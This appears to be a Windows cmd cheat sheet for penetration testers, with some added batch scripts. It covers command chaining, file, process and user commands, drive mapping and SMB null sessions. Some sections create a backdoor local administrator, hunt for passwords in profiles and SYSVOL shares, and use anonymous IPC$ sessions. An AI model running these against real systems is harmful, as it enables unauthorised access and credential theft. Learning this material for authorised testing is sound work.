cmd

The equivalent of the Linux command separator ; as in

echo "command 1" ; echo "command 2"

is & in cmd:

dir & whoami

& runs the second command no matter whether the first one succeeded. cmd also understands && (run the second command only if the first returned exit code 0) and || (run the second command only if the first failed), with the same meaning they have in bash, so you can chain enumeration steps and fall back when one of them fails.

Dealing with files and stuff

Delete file

del file.txt

Create folder/directory

md folderName

Show hidden files (/A lists all entries, including hidden and system files)

dir /A

Print out file content, like cat

type file.txt

grep files (findstr needs a search pattern as well as a file name; add /I for a case-insensitive match and /S to search subdirectories)

findstr "pattern" file.txt
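As an added example (not code from the original page), the file commands above combined into a small credential hunt: dir /A finds hidden files, findstr greps recursively across several file types, and type dumps a hit. The profile path, the search term and the notes.txt file name are assumptions.

```batch
@echo off
rem Added example, not from the original page: use dir /A, findstr and type
rem together to look for credentials in a user profile. TARGET, the search
rem term and the notes.txt file name are assumptions for the demo.
setlocal
set "TARGET=%USERPROFILE%"

echo [*] Hidden files under %TARGET% (/A:H = hidden, /S = recurse, /B = bare paths)
dir /A:H /S /B "%TARGET%" 2>nul

echo [*] Files that mention "password" (/S recurse, /I ignore case, /M file names only)
findstr /S /I /M /C:"password" "%TARGET%\*.txt" "%TARGET%\*.ini" "%TARGET%\*.xml" "%TARGET%\*.config" 2>nul

echo [*] The matching lines themselves, with file name and line number (/N)
findstr /S /I /N /C:"password" "%TARGET%\*.txt" 2>nul

rem Print one whole file with type (cmd's cat); the file name is an assumption
if exist "%TARGET%\notes.txt" type "%TARGET%\notes.txt"
endlocal
```

/C:"password" searches for the literal string; without /C findstr treats each space-separated word of the pattern as a separate search term, which is a common source of surprising matches.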

Network

Show network information

netstat -an

Show network adapter info

ipconfig

Ping another machine

ping <ip>

Traceroute

tracert <host>

Processes

List processes

tasklist

Kill a process

taskkill /PID 1532 /F
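taskkill /PID expects a PID, which you usually first have to look up. As an added example (not from the original page), this script finds a process by image name with tasklist, kills every matching PID, and then shows what is left with the owning user. The image name notepad.exe is an assumption.

```batch
@echo off
rem Added example, not from the original page: look up a process by image name
rem and kill it by PID, as the page's taskkill /PID line expects. IMAGE is an
rem assumption for the demo.
setlocal
set "IMAGE=notepad.exe"

rem tasklist /FI filters on image name and /NH drops the header; the second
rem whitespace-separated token of each line is the PID. The findstr filter drops
rem the "INFO: No tasks are running..." line tasklist prints when nothing matches.
for /f "tokens=2" %%p in ('tasklist /FI "IMAGENAME eq %IMAGE%" /NH ^| findstr /I /C:"%IMAGE%"') do (
    echo [*] killing %IMAGE% with PID %%p
    taskkill /PID %%p /F
)

rem /V adds the user name and session of each process, useful for privesc recon
tasklist /V /FI "IMAGENAME eq %IMAGE%"
endlocal
```

Use %%p inside a batch file and %p when typing the same for loop interactively at the prompt.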

Users

List local users

net users

# Add user and make it a local administrator (the group is called Administrators)
net user hacker my_password /add
net localgroup Administrators hacker /add

# Check if you are part of a domain: this lists the domain's groups and fails
# if the machine is not domain-joined or no domain controller is reachable
net localgroup /domain

# List all users in a domain
net users /domain
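As an added example (not code from the original page), the user commands above as one script that creates the account, adds it to Administrators, verifies the result instead of assuming it, and checks domain membership in two ways. The user name and password come from the page; the use of %USERDOMAIN% and %COMPUTERNAME% for the local-vs-domain check is my addition.

```batch
@echo off
rem Added example, not from the original page: create a local admin, verify it,
rem and check domain membership. Run from an elevated cmd; NEWUSER/NEWPASS are the
rem page's demo values.
setlocal
set "NEWUSER=hacker"
set "NEWPASS=my_password"

rem || runs the fallback only if net user failed (not elevated, policy, name taken)
net user "%NEWUSER%" "%NEWPASS%" /add || (echo [!] net user failed - are you elevated? & exit /b 1)
net localgroup Administrators "%NEWUSER%" /add || (echo [!] could not add to Administrators & exit /b 1)

rem Verify: the account must now appear in the Administrators group listing
net localgroup Administrators | findstr /I /C:"%NEWUSER%" >nul && echo [+] %NEWUSER% is a local admin

rem Domain check 1: for a local account USERDOMAIN equals the computer name
echo [*] USERDOMAIN=%USERDOMAIN%  COMPUTERNAME=%COMPUTERNAME%
if /I "%USERDOMAIN%"=="%COMPUTERNAME%" (echo [*] current user is a local account) else (echo [*] current user is a domain account in %USERDOMAIN%)

rem Domain check 2: only succeeds when the box is domain-joined and a DC answers
net user /domain 2>nul || echo [*] not domain-joined or no domain controller reachable
endlocal
```

Creating a local administrator is noisy (event IDs 4720 and 4732 in the Security log), so on a real engagement note the account for cleanup and prefer it only when the rules of engagement allow it.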

Other

Shutdown

 # Shutdown now
 shutdown /s /t 0

 # Restart
 shutdown /r /t 0

cipher - Wipe deallocated space

 # Overwrites all free (deallocated) space on the volume so that deleted files
 # cannot be recovered. It does not touch existing files and it takes a long
 # time on a large drive.
 cipher /w:C:\

Show environmental variables

set

Show options for commands

The equivalent of the man pages in Windows is simply help (most commands also print their usage when given /?):

help dir

Mounting - Mapping

In the Windows world mounting is called mapping.

If you want to see which drives are mapped/mounted to your file system you can use any of these commands:

# This is the most thorough (note that wmic is deprecated and missing from recent Windows 11 builds)
wmic logicaldisk get deviceid, volumename, description

# But these work too
wmic logicaldisk get name
wmic logicaldisk get caption

# This can be slow, so don't kill your shell!
fsutil fsinfo drives

# With PowerShell
get-psdrive -psprovider filesystem

# This works too, but it is interactive, so it can hang a non-interactive reverse shell
diskpart
list volume

# Lists only mapped network drives
net use

The command to deal with mounting/mapping is net use.

Using net use we can connect to shared folders on other systems. Many Windows machines have a default share called IPC$ (the interprocess communication share). It does not contain any files, but on older or misconfigured hosts it can be connected to with an empty user name and an empty password. This is called a null session. Although the share contains no files, a null session exposes a lot of data that is useful for enumeration (users, groups, shares, policies). Recent Windows versions reject anonymous IPC$ access by default, so a refused connection is itself a finding. The Linux equivalent of net use is usually smbclient.

net use \\<ip>\IPC$ "" /u:""

If you want to map a share from another machine into your filesystem you can do that like this:

# This will map it to drive z
net use z: \\192.168.1.101\SYSVOL

# This will map it to the first available drive letter
net use * \\192.168.1.101\SYSVOL

Here you map the share to the letter z. If the command is successful you should now be able to access those files by changing to the z drive:

C:\>z:
Z:\

# Now we switch back to c
Z:\>c:
C:\

Remove a network drive - unmount it

First leave the drive if you are in it, then delete the mapping:

c:
net use z: /del
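As an added example (not code from the original page), the whole mapping workflow as one script: list current mappings, try the IPC$ null session, map the share to Z:, enumerate it, and clean up. It also puts the &&/|| chaining from the top of the page to work for error handling. The target IP and share name are the page's demo values; the credential-hunting file types are assumptions.

```batch
@echo off
rem Added example, not from the original page: null session, mapping a share to a
rem drive letter, enumerating it and cleaning up. TARGET and SHARE are the page's
rem demo values; the file types searched on the share are assumptions.
setlocal
set "TARGET=192.168.1.101"
set "SHARE=SYSVOL"

echo [*] Currently mapped network drives
net use

rem Null session: empty password, empty user. Modern Windows rejects this by
rem default, so a failure here is information, not a reason to stop.
net use \\%TARGET%\IPC$ "" /u:"" && (echo [+] null session to %TARGET% accepted) || (echo [-] null session rejected)

rem Map the share to Z: for this session only (/persistent:no leaves no mapping behind)
net use Z: \\%TARGET%\%SHARE% /persistent:no
if errorlevel 1 (
    echo [!] could not map \\%TARGET%\%SHARE%
    goto :cleanup
)

echo [*] Listing Z:\ including hidden files
dir /A Z:\

rem Scripts on a share are a classic place for hard-coded credentials; file names only
findstr /S /I /M /C:"password" Z:\*.vbs Z:\*.bat Z:\*.ps1 Z:\*.xml 2>nul

:cleanup
rem Leave the drive before deleting the mapping, then drop the null session too
C:
net use Z: /del /y 2>nul
net use \\%TARGET%\IPC$ /del /y 2>nul
endlocal
```

If you already hold credentials, add /user:DOMAIN\name password to the net use line that maps the share; without them the mapping is attempted with the current token, which on a domain-joined box is usually what you want.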

References and Stuff

This might come in handy for the Linux users:

http://www.lemoda.net/windows/windows2unix/windows2unix.html

Last updated 4 years ago